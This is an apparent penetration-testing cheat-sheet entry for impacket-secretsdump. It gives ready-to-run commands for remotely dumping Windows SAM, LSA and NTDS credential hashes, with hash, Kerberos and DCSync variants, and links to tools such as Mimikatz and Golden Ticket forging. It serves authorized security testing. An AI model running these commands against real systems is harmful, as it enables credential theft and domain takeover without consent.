Impacket Secrets Dump
Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Tool
- impacket-secretsdump
- Category
- Credential Attacks / Hash Dumping
- Platform
- linux
- Requires
- password
- Protocols
- SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-secretsdump '<domain>/<user>:<password>'@<ip>
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-secretsdump -hashes ':<hash>' '<domain>/<user>'@<ip>
Kerberos Ticket requires Kerberos ticket
impacket-secretsdump -k -no-pass '<domain>/<user>'@<ip>
DCSync (just NTLM) requires Kerberos ticket
impacket-secretsdump -k -no-pass '<domain>/<user>'@<ip> -just-dc-ntlm -outputfile dcsync
DCSync (full) requires Kerberos ticket
impacket-secretsdump -k -no-pass '<domain>/<user>'@<ip> -just-dc -outputfile dcsync -pwd-last-set -user-status
Examples
impacket-secretsdump 'CORP/administrator:password123'@192.168.1.100
impacket-secretsdump -hashes ':e19ccf75ee54e06b06a5907af13cef42' 'CORP/administrator'@192.168.1.100
Tags
References
Related commands
- Hashcat NTLM Crack Crack NTLM hashes using wordlist attack
- Evil-WinRM Shell Windows Remote Management shell connection
- Impacket Golden Ticket Forge a Golden Ticket (TGT) using the krbtgt NTLM hash
- Impacket DPAPI Masterkey Decrypt DPAPI masterkey using user password to derive DPAPI encryption key
- Impacket Targeted DCSync (Single User) DCSync only one specific account instead of replicating the whole NTDS. Massively…
- Lsassy LSASS Dump Remotely dump LSASS credentials using lsassy
- Mimikatz Credential Dump Extract plaintext passwords and hashes from all available sources
- Mimikatz dpapi::masterkey Decrypt a DPAPI master key using the owner's plaintext password (or NT hash). Required…